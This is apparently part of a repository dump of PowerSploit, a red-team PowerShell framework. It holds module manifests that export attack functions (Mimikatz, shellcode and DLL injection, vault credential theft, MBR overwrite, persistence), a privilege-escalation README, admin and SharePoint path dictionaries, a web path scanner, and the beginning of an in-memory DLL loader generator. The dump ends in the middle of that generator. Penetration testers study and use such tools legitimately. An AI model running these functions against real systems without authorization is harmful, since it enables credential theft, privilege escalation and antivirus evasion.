'Get-NetDomainController',
'Get-NetDomainTrust',
'Get-NetFileServer',
'Get-NetForest',
'Get-NetForestCatalog',
'Get-NetForestDomain',
'Get-NetForestTrust',
'Get-NetGPO',
'Get-NetGPOGroup',
'Get-NetGroup',
'Get-NetGroupMember',
'Get-NetLocalGroup',
'Get-NetLoggedon',
'Get-NetOU',
'Get-NetProcess',
'Get-NetRDPSession',
'Get-NetSession',
'Get-NetShare',
'Get-NetSite',
'Get-NetSubnet',
'Get-NetUser',
'Get-ObjectAcl',
'Get-PathAcl',
'Get-Proxy',
'Get-RegistryAlwaysInstallElevated',
'Get-RegistryAutoLogon',
'Get-SecurityPackages',
'Get-ServiceDetail',
'Get-ServiceUnquoted',
'Get-SiteListPassword',
'Get-System',
'Get-TimedScreenshot',
'Get-UnattendedInstallFile',
'Get-UserEvent',
'Get-UserProperty',
'Get-VaultCredential',
'Get-VolumeShadowCopy',
'Get-Webconfig',
'Install-ServiceBinary',
'Install-SSP',
'Invoke-ACLScanner',
'Invoke-AllChecks',
'Invoke-CheckLocalAdminAccess',
'Invoke-CredentialInjection',
'Invoke-DllInjection',
'Invoke-EnumerateLocalAdmin',
'Invoke-EventHunter',
'Invoke-FileFinder',
'Invoke-MapDomainTrust',
'Invoke-Mimikatz',
'Invoke-NinjaCopy',
'Invoke-Portscan',
'Invoke-ProcessHunter',
'Invoke-ReflectivePEInjection',
'Invoke-ReverseDnsLookup',
'Invoke-ServiceAbuse',
'Invoke-ShareFinder',
'Invoke-Shellcode',
'Invoke-TokenManipulation',
'Invoke-UserHunter',
'Invoke-WmiCommand',
'Mount-VolumeShadowCopy',
'New-ElevatedPersistenceOption',
'New-UserPersistenceOption',
'New-VolumeShadowCopy',
'Out-CompressedDll',
'Out-EncodedCommand',
'Out-EncryptedScript',
'Out-Minidump',
'Remove-Comments',
'Remove-VolumeShadowCopy',
'Restore-ServiceBinary',
'Set-ADObject',
'Set-CriticalProcess',
'Set-MacAttribute',
'Set-MasterBootRecord',
'Set-ServiceBinPath',
'Test-ServiceDaclPermission',
'Write-HijackDll',
'Write-ServiceBinary',
'Write-UserAddMSI'
)

# List of all modules packaged with this module.
# NOTE(review): the Mayhem module (Mayhem.psd1, GUID
# e65b93ff-63ba-4c38-97f1-bc4fe5a6651c) is not listed here although its
# functions appear in FunctionsToExport above. 'PrivEsc' also differs in case
# from the Privesc folder and manifest; harmless on a case-insensitive file
# system but worth aligning.
ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '3.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'},
@{ModuleName = 'CodeExecution'; ModuleVersion = '3.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'},
@{ModuleName = 'Exfiltration'; ModuleVersion = '3.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'},
@{ModuleName = 'Recon'; ModuleVersion = '3.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'},
@{ModuleName = 'ScriptModification'; ModuleVersion = '3.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'},
@{ModuleName = 'Persistence'; ModuleVersion = '3.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'},
@{ModuleName = 'PrivEsc'; ModuleVersion = '3.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} )

PrivateData = @{

PSData = @{

# Tags applied to this module. These help with module discovery in online galleries.
Tags = @('security','pentesting','red team','offense')

# A URL to the license for this module.
# NOTE(review): this points at the Apache 2.0 license text, but Copyright
# above and the repository's LICENSE file state BSD 3-Clause; confirm which
# license applies and make the two agree.
LicenseUri = 'http://www.apache.org/licenses/LICENSE-2.0.html'

# A URL to the main website for this project.
ProjectUri = 'https://github.com/PowerShellMafia/PowerSploit'

}

}

}

175 |
--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
# Import every sub-module folder that sits beside this file, skipping the Tests
# folder. -DisableNameChecking silences the warnings that non-approved verbs in
# the sub-modules' function names would otherwise produce.
Get-ChildItem $PSScriptRoot |
    Where-Object { $_.PSIsContainer -and ($_.Name -ne 'Tests') } |
    ForEach-Object { Import-Module $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
@{

# Manifest for the PowerSploit Privesc module (PowerUp plus Get-System).
# Privesc.psm1 dot-sources every .ps1 file in the folder; only the functions
# named in FunctionsToExport below become visible to importers.

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Privesc.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'

# Author of this module
Author = 'Will Schroeder'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Privesc Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# NOTE(review): 'Get-CachedGPPPassword' is exported here but is absent from
# the root PowerSploit.psd1 FunctionsToExport list; keep the two in sync.
FunctionsToExport = @(
'Add-ServiceDacl',
'Find-PathDLLHijack',
'Find-ProcessDLLHijack',
'Get-ApplicationHost',
'Get-CachedGPPPassword',
'Get-CurrentUserTokenGroupSid',
'Get-ModifiablePath',
'Get-ModifiableRegistryAutoRun',
'Get-ModifiableScheduledTaskFile',
'Get-ModifiableService',
'Get-ModifiableServiceFile',
'Get-RegistryAlwaysInstallElevated',
'Get-RegistryAutoLogon',
'Get-ServiceDetail',
'Get-ServiceUnquoted',
'Get-SiteListPassword',
'Get-System',
'Get-UnattendedInstallFile',
'Get-Webconfig',
'Install-ServiceBinary',
'Invoke-AllChecks',
'Invoke-ServiceAbuse',
'Restore-ServiceBinary',
'Set-ServiceBinPath',
'Test-ServiceDaclPermission',
'Write-HijackDll',
'Write-ServiceBinary',
'Write-UserAddMSI'
)

# List of all files packaged with this module
# NOTE(review): unlike the Mayhem and Persistence manifests, this list omits
# the manifest itself ('Privesc.psd1'); confirm whether it should be included.
FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'

}


60 |
61 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 file beside this module file so the functions they
# define land in the module's scope; Privesc.psd1 decides which are exported.
foreach ($ScriptFile in Get-ChildItem (Join-Path $PSScriptRoot *.ps1))
{
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/Privesc/README.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Privesc folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Privesc`
7 |
8 | To see the commands imported, type `Get-Command -Module Privesc`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
13 |
14 |
15 | ## PowerUp
16 |
17 | PowerUp aims to be a clearinghouse of common Windows privilege escalation
18 | vectors that rely on misconfigurations.
19 |
20 | Running Invoke-AllChecks will output any identifiable vulnerabilities along
21 | with specifications for any abuse functions. The -HTMLReport flag will also
22 | generate a COMPUTER.username.html version of the report.
23 |
24 | Author: @harmj0y
25 | License: BSD 3-Clause
26 | Required Dependencies: None
27 | Optional Dependencies: None
28 |
29 |
30 | ### Service Enumeration:
31 | Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name
32 | Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config
33 | Get-ModifiableService - returns services the current user can modify
34 | Get-ServiceDetail - returns detailed information about a specified service
35 |
36 | ### Service Abuse:
37 | Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command
38 | Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command
39 | Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command
40 | Restore-ServiceBinary - restores a replaced service binary with the original executable
41 |
42 | ### DLL Hijacking:
43 | Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes
44 | Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities
45 | Write-HijackDll - writes out a hijackable DLL
46 |
47 | ### Registry Checks:
48 | Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
49 | Get-RegistryAutoLogon - checks for Autologon credentials in the registry
50 | Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
51 |
52 | ### Miscellaneous Checks:
53 | Get-ModifiableScheduledTaskFile - finds scheduled tasks with modifiable target files
54 | Get-UnattendedInstallFile - finds remaining unattended installation files
55 | Get-Webconfig - checks for any encrypted web.config strings
56 | Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
57 | Get-SiteListPassword - retrieves the plaintext passwords from any McAfee SiteList.xml files found
58 | Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files
59 |
60 | ### Other Helpers/Meta-Functions:
61 | Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify
62 | Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not
63 | Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service
64 | Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods
65 | Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set
66 | Write-UserAddMSI - writes out an MSI installer that prompts for a user to be added
67 | Invoke-AllChecks - runs all current escalation checks and returns a report
68 |
--------------------------------------------------------------------------------
/Recon/Dictionaries/admin.txt:
--------------------------------------------------------------------------------
1 | admin1.php
2 | admin.asp
3 | admin/account.asp
4 | admin/account.html
5 | admin/account.php
6 | admin/controlpanel.asp
7 | admin/controlpanel.html
8 | admin/controlpanel.php
9 | admin/cp.asp
10 | admin/cp.html
11 | admin/cp.php
12 | admin/home.asp
13 | admin/home.php
14 | admin/index.asp
15 | admin/index.html
16 | admin/login.asp
17 | admin/login.html
18 | admin/login.php
19 | admin1.asp
20 | admin1.html
21 | admin1/
22 | admin2.asp
23 | admin2.html
24 | admin2.php
25 | admin4_account/
26 | admin4_colon/
27 | admincontrol.asp
28 | admincontrol.html
29 | admincontrol.php
30 | administer/
31 | administr8.asp
32 | administr8.html
33 | administr8.php
34 | administr8/
35 | administracao.php
36 | administracao/
37 | administracion.php
38 | administracion/
39 | administrateur.php
40 | administrateur/
41 | administratie/
42 | administration.html
43 | administration.php
44 | administration/
45 | administrator.asp
46 | administrator.html
47 | administrator.php
48 | administrator/account.asp
49 | administrator/account.html
50 | administrator/account.php
51 | administrator/index.asp
52 | administrator/index.html
53 | administrator/index.php
54 | administrator/login.asp
55 | administrator/login.html
56 | administrator/login.php
57 | administratoraccounts/
58 | administrators/
59 | administrivia/
60 | adminpanel.asp
61 | adminpanel.html
62 | adminpanel.php
63 | adminpro/
64 | admins.asp
65 | admins.html
66 | admins.php
67 | admins/
68 | AdminTools/
69 | amministratore.php
70 | amministratore/
71 | autologin/
72 | banneradmin/
73 | bbadmin/
74 | beheerder.php
75 | beheerder/
76 | bigadmin/
77 | blogindex/
78 | cadmins/
79 | ccms/
80 | ccms/index.php
81 | ccms/login.php
82 | ccp14admin/
83 | cmsadmin/
84 | configuration/
85 | configure/
86 | controlpanel.asp
87 | controlpanel.html
88 | controlpanel.php
89 | controlpanel/
90 | cp.asp
91 | cp.html
92 | cp.php
93 | cpanel_file/
94 | customer_login/
95 | database_administration/
96 | Database_Administration/
97 | dir-login/
98 | directadmin/
99 | ezsqliteadmin/
100 | fileadmin.asp
101 | fileadmin.html
102 | fileadmin.php
103 | formslogin/
104 | globes_admin/
105 | hpwebjetadmin/
106 | Indy_admin/
107 | irc-macadmin/
108 | LiveUser_Admin/
109 | login_db/
110 | login-redirect/
111 | login-us/
112 | login.asp
113 | login.html
114 | login.php
115 | login1/
116 | loginflat/
117 | logo_sysadmin/
118 | Lotus_Domino_Admin/
119 | macadmin/
120 | maintenance/
121 | manuallogin/
122 | memlogin/
123 | meta_login/
124 | modelsearch/login.asp
125 | modelsearch/login.php
126 | moderator.asp
127 | moderator.html
128 | moderator.php
129 | moderator/
130 | moderator/admin.asp
131 | moderator/admin.html
132 | moderator/admin.php
133 | moderator/login.asp
134 | moderator/login.html
135 | moderator/login.php
136 | myadmin/
137 | navSiteAdmin/
138 | newsadmin/
139 | openvpnadmin/
140 | painel/
141 | panel/
142 | pgadmin/
143 | phpldapadmin/
144 | phppgadmin/
145 | phpSQLiteAdmin/
146 | platz_login/
147 | power_user/
148 | project-admins/
149 | pureadmin/
150 | radmind-1/
151 | radmind/
152 | rcLogin/
153 | server_admin_small/
154 | Server.asp
155 | Server.html
156 | Server.php
157 | ServerAdministrator/
158 | showlogin/
159 | simpleLogin/
160 | smblogin/
161 | sql-admin/
162 | ss_vms_admin_sm/
163 | sshadmin/
164 | staradmin/
165 | sub-login/
166 | Super-Admin/
167 | support_login/
168 | sys-admin/
169 | sysadmin.asp
170 | sysadmin.html
171 | sysadmin.php
172 | sysadmin/
173 | SysAdmin/
174 | SysAdmin2/
175 | sysadmins/
176 | system_administration/
177 | system-administration/
178 | ur-admin.asp
179 | ur-admin.html
180 | ur-admin.php
181 | ur-admin/
182 | useradmin/
183 | UserLogin/
184 | utility_login/
185 | v2/painel/
186 | vadmind/
187 | vmailadmin/
188 | webadmin.asp
189 | webadmin.html
190 | webadmin.php
191 | webmaster/
192 | websvn/
193 | wizmysqladmin/
194 | wp-admin/
195 | wp-login/
196 | xlogin/
197 | yonetici.asp
198 | yonetici.html
199 | yonetici.php
200 | yonetim.asp
201 | yonetim.html
202 | yonetim.php
--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xdea/PowerSploit/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/Recon/Dictionaries/sharepoint.txt:
--------------------------------------------------------------------------------
1 | _catalogs/masterpage/Forms/AllItems.aspx
2 | _catalogs/wp/Forms/AllItems.aspx
3 | _catalogs/wt/Forms/Common.aspx
4 | _layouts/1033/IMAGES
5 | _layouts/aclinv.aspx
6 | _layouts/addrole.aspx
7 | _layouts/AdminRecycleBin.aspx
8 | _layouts/AreaNavigationSettings.aspx
9 | _Layouts/AreaTemplateSettings.aspx
10 | _Layouts/AreaWelcomePage.aspx
11 | _layouts/associatedgroups.aspx
12 | _layouts/bpcf.aspx
13 | _Layouts/ChangeSiteMasterPage.aspx
14 | _layouts/create.aspx
15 | _layouts/editgrp.aspx
16 | _layouts/editprms.aspx
17 | _layouts/groups.aspx
18 | _layouts/help.aspx
19 | _layouts/images/
20 | _layouts/listedit.aspx
21 | _layouts/ManageFeatures.aspx
22 | _layouts/ManageFeatures.aspx?Scope=Site
23 | _layouts/mcontent.aspx
24 | _layouts/mngctype.aspx
25 | _layouts/mngfield.aspx
26 | _layouts/mngsiteadmin.aspx
27 | _layouts/mngsubwebs.aspx
28 | _layouts/mngsubwebs.aspx?view=sites
29 | _layouts/mobile/mbllists.aspx
30 | _layouts/MyInfo.aspx
31 | _layouts/MyPage.aspx
32 | _layouts/MyTasks.aspx
33 | _layouts/navoptions.aspx
34 | _layouts/NewDwp.aspx
35 | _layouts/newgrp.aspx
36 | _layouts/newsbweb.aspx
37 | _layouts/PageSettings.aspx
38 | _layouts/people.aspx
39 | _layouts/people.aspx?MembershipGroupId=0
40 | _layouts/permsetup.aspx
41 | _layouts/picker.aspx
42 | _layouts/policy.aspx
43 | _layouts/policyconfig.aspx
44 | _layouts/policycts.aspx
45 | _layouts/Policylist.aspx
46 | _layouts/prjsetng.aspx
47 | _layouts/quiklnch.aspx
48 | _layouts/recyclebin.aspx
49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
50 | _layouts/role.aspx
51 | _layouts/settings.aspx
52 | _layouts/SiteDirectorySettings.aspx
53 | _layouts/sitemanager.aspx
54 | _Layouts/SiteManager.aspx?lro=all
55 | _layouts/spcf.aspx
56 | _layouts/storman.aspx
57 | _layouts/themeweb.aspx
58 | _layouts/topnav.aspx
59 | _layouts/user.aspx
60 | _layouts/userdisp.aspx
61 | _layouts/userdisp.aspx?ID=1
62 | _layouts/useredit.aspx
63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
64 | _layouts/viewgrouppermissions.aspx
65 | _layouts/viewlsts.aspx
66 | _layouts/vsubwebs.aspx
67 | _layouts/WPPrevw.aspx?ID=247
68 | _layouts/wrkmng.aspx
69 | _vti_bin/Admin.asmx
70 | _vti_bin/alerts.asmx
71 | _vti_bin/dspsts.asmx
72 | _vti_bin/forms.asmx
73 | _vti_bin/Lists.asmx
74 | _vti_bin/people.asmx
75 | _vti_bin/Permissions.asmx
76 | _vti_bin/search.asmx
77 | _vti_bin/UserGroup.asmx
78 | _vti_bin/versions.asmx
79 | _vti_bin/Views.asmx
80 | _vti_bin/webpartpages.asmx
81 | _vti_bin/webs.asmx
82 | _vti_bin/spsdisco.aspx
83 | _vti_bin/AreaService.asmx
84 | _vti_bin/BusinessDataCatalog.asmx
85 | _vti_bin/ExcelService.asmx
86 | _vti_bin/SharepointEmailWS.asmx
87 | _vti_bin/spscrawl.asmx
88 | _vti_bin/spsearch.asmx
89 | _vti_bin/UserProfileService.asmx
90 | _vti_bin/WebPartPages.asmx
91 | default.aspx
92 | Forms/DispForm.aspx
93 | Forms/DispForm.aspx?ID=1
94 | Forms/EditForm.aspx
95 | Forms/EditForm.aspx?ID=1
96 | Forms/Forms/AllItems.aspx
97 | Forms/MyItems.aspx
98 | Forms/NewForm.aspx
99 | Pages/default.aspx
100 | Pages/Forms/AllItems.aspx
101 | shared documents/forms/allitems.aspx
--------------------------------------------------------------------------------
/Recon/Get-HttpStatus.ps1:
--------------------------------------------------------------------------------
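function Get-HttpStatus
{
<#
.SYNOPSIS

Returns the HTTP Status Codes and full URL for specified paths.

PowerSploit Function: Get-HttpStatus
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

A script to check for the existence of a path or file on a webserver. One request
is issued for every non-blank line of the dictionary file and an object holding the
resulting status and the full URL is emitted per entry. Every entry produces a
server-side log line, so size the dictionary accordingly.

.PARAMETER Target

Specifies the remote web host either by IP or hostname.

.PARAMETER Path

Specifies the path to the dictionary file that lists, one per line, the URL paths
to test on the target. Defaults to '.\Dictionaries\admin.txt'.

.PARAMETER Port

Specifies the port to connect to. Defaults to 443 when -UseSSL is given and to 80
otherwise.

.PARAMETER UseSSL

Use an SSL connection. Server certificate validation is disabled for the duration
of the scan (self-signed and mismatched certificates are common on internal hosts)
and the previous process-wide validation callback is restored when the scan ends.

.EXAMPLE

C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Where-Object { [Int]$_.Status -eq 200 }

.EXAMPLE

C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL

.OUTPUTS

System.Management.Automation.PSObject

One object per dictionary entry with a 'URL' property and a 'Status' property. Status
is the System.Net.HttpStatusCode of the response when one was received (including
4xx/5xx responses, which .NET surfaces as exceptions) and the
System.Net.WebExceptionStatus otherwise (e.g. name resolution or connection failures).

.NOTES

HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error

.LINK

http://obscuresecurity.blogspot.com
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
#>

    [CmdletBinding()] Param(
        [Parameter(Mandatory = $True)]
        [String]
        $Target,

        [String]
        [ValidateNotNullOrEmpty()]
        $Path = '.\Dictionaries\admin.txt',

        [ValidateRange(0, 65535)]
        [Int]
        $Port,

        [Switch]
        $UseSSL
    )

    if (-not (Test-Path $Path)) {
        Write-Error "Path Test Failed - Check Dictionary Path"
        Return
    }

    if ($Port -eq 0) {
        # No port given: default to 443 if SSL is specified, otherwise to 80
        if ($UseSSL) { $Port = 443 } else { $Port = 80 }
    }

    Write-Verbose "Path Test Succeeded - Testing Connectivity"

    # Validate that the host is listening before scanning. The TcpClient is
    # closed in the finally block on both the success and the failure path.
    $TcpConnection = New-Object System.Net.Sockets.TcpClient
    try {
        $TcpConnection.Connect($Target, $Port)
    } catch {
        Write-Error "Connection Test Failed - Check Target"
        Return
    } finally {
        $TcpConnection.Close()
    }

    if ($UseSSL) {
        $SSL = 's'
        # Ignore invalid SSL certificates while scanning. ServerCertificateValidationCallback
        # is a process-wide setting, so the previous value is captured here and restored in
        # the finally block below instead of leaving certificate checking disabled for every
        # later HTTPS call made from this PowerShell session.
        $PreviousCallback = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
    } else {
        $SSL = ''
    }

    if (($Port -eq 80) -or ($Port -eq 443)) {
        $PortNum = ''
    } else {
        $PortNum = ":$Port"
    }

    try {
        # Check Http status for each entry in the dictionary file
        foreach ($Item in Get-Content $Path) {

            # A blank line would otherwise be requested as the site root.
            if ([String]::IsNullOrEmpty($Item.Trim())) { continue }

            $WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)"
            $URI = New-Object Uri($WebTarget)

            try {
                $WebRequest = [System.Net.WebRequest]::Create($URI)
                $WebResponse = $WebRequest.GetResponse()
                $WebStatus = $WebResponse.StatusCode
                $WebResponse.Close()
            } catch {
                # GetResponse throws for error responses; the HTTP status is then
                # carried on the WebException's Response object.
                $WebStatus = $_.Exception.InnerException.Response.StatusCode

                if ($WebStatus -eq $null) {
                    # Not every exception returns a StatusCode.
                    # If that is the case, return the Status.
                    $WebStatus = $_.Exception.InnerException.Status
                }
            }

            $Result = @{ Status = $WebStatus;
                         URL = $WebTarget }

            $ScanObject = New-Object -TypeName PSObject -Property $Result

            Write-Output $ScanObject
        }
    } finally {
        if ($UseSSL) {
            [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $PreviousCallback
        }
    }
}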
141 |
--------------------------------------------------------------------------------
/Recon/Recon.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Recon.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber', 'Will Schroeder'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Reconnaissance Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = @(
26 | 'Add-NetGroupUser',
27 | 'Add-NetUser',
28 | 'Add-ObjectAcl',
29 | 'Convert-NameToSid',
30 | 'Convert-SidToName',
31 | 'Convert-ADName',
32 | 'ConvertFrom-UACValue',
33 | 'Export-PowerViewCSV',
34 | 'Find-ComputerField',
35 | 'Find-ForeignGroup',
36 | 'Find-ForeignUser',
37 | 'Find-GPOComputerAdmin',
38 | 'Find-GPOLocation',
39 | 'Find-InterestingFile',
40 | 'Find-LocalAdminAccess',
41 | 'Find-ManagedSecurityGroups',
42 | 'Find-UserField',
43 | 'Get-ADObject',
44 | 'Get-CachedRDPConnection',
45 | 'Get-ComputerDetails',
46 | 'Get-ComputerProperty',
47 | 'Get-DFSshare',
48 | 'Get-DNSRecord',
49 | 'Get-DNSZone',
50 | 'Get-DomainPolicy',
51 | 'Get-DomainSID',
52 | 'Get-ExploitableSystem',
53 | 'Get-GUIDMap',
54 | 'Get-HttpStatus',
55 | 'Get-IPAddress',
56 | 'Get-LastLoggedOn',
57 | 'Get-LoggedOnLocal',
58 | 'Get-NetComputer',
59 | 'Get-NetDomain',
60 | 'Get-NetDomainController',
61 | 'Get-NetDomainTrust',
62 | 'Get-NetFileServer',
63 | 'Get-NetForest',
64 | 'Get-NetForestCatalog',
65 | 'Get-NetForestDomain',
66 | 'Get-NetForestTrust',
67 | 'Get-NetGPO',
68 | 'Get-NetGPOGroup',
69 | 'Get-NetGroup',
70 | 'Get-NetGroupMember',
71 | 'Get-NetLocalGroup',
72 | 'Get-NetLoggedon',
73 | 'Get-NetOU',
74 | 'Get-NetProcess',
75 | 'Get-NetRDPSession',
76 | 'Get-NetSession',
77 | 'Get-NetShare',
78 | 'Get-NetSite',
79 | 'Get-NetSubnet',
80 | 'Get-NetUser',
81 | 'Get-ObjectAcl',
82 | 'Get-PathAcl',
83 | 'Get-Proxy',
84 | 'Get-RegistryMountedDrive',
85 | 'Get-SiteName',
86 | 'Get-UserEvent',
87 | 'Get-UserProperty',
88 | 'Invoke-ACLScanner',
89 | 'Invoke-CheckLocalAdminAccess',
90 | 'Invoke-DowngradeAccount',
91 | 'Invoke-EnumerateLocalAdmin',
92 | 'Invoke-EventHunter',
93 | 'Invoke-FileFinder',
94 | 'Invoke-MapDomainTrust',
95 | 'Invoke-Portscan',
96 | 'Invoke-ProcessHunter',
97 | 'Invoke-ReverseDnsLookup',
98 | 'Invoke-ShareFinder',
99 | 'Invoke-UserHunter',
100 | 'New-GPOImmediateTask',
101 | 'Request-SPNTicket',
102 | 'Set-ADObject'
103 | )
104 |
105 | # List of all files packaged with this module
106 | FileList = 'Recon.psm1', 'Recon.psd1', 'PowerView.ps1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1',
107 | 'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'README.md'
108 |
109 | }
110 |
--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
# Dot-source every *.ps1 that sits next to this module file so that their functions
# are defined in the module scope; the manifest's FunctionsToExport list decides which
# of them become visible to callers. Because this is a glob rather than a fixed file
# list, any .ps1 dropped into the module directory is executed on Import-Module -
# keep the folder's ACLs tight.
Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1') | ForEach-Object { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/ScriptModification/Out-CompressedDll.ps1:
--------------------------------------------------------------------------------
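function Out-CompressedDll
{
<#
.SYNOPSIS

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

PowerSploit Function: Out-CompressedDll
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
The emitted loader inflates the Deflate stream into a byte array of the original file's length, reading in a loop
until that many bytes have been produced, and then hands the array to [Reflection.Assembly]::Load.

.PARAMETER FilePath

Specifies the path to a managed executable.

.EXAMPLE

C:\PS> Out-CompressedDll -FilePath evil.dll

Description
-----------
Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.

.OUTPUTS

System.String

The PowerShell source of the loader, including the base64-encoded compressed file.

.NOTES

Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.

The input is only checked for the 'MZ' DOS header; whether it is actually a managed assembly is not verified here
and will instead surface as an exception from Assembly.Load when the generated code runs.

.LINK

http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
#>

    [CmdletBinding()] Param (
        [Parameter(Mandatory = $True)]
        [String]
        $FilePath
    )

    # -ErrorAction Stop turns a missing path into a terminating error that names
    # the path instead of falling through with an empty $Path.
    $Path = Resolve-Path $FilePath -ErrorAction Stop

    if (! [IO.File]::Exists($Path.ProviderPath))
    {
        Throw "$Path does not exist."
    }

    $FileBytes = [System.IO.File]::ReadAllBytes($Path.ProviderPath)

    # Minimal sanity check: a PE image starts with the 'MZ' DOS header.
    if (($FileBytes.Length -lt 2) -or ((($FileBytes[0..1] | % {[Char]$_}) -join '') -cne 'MZ'))
    {
        Throw "$Path is not a valid executable."
    }

    $Length = $FileBytes.Length
    $CompressedStream = New-Object IO.MemoryStream
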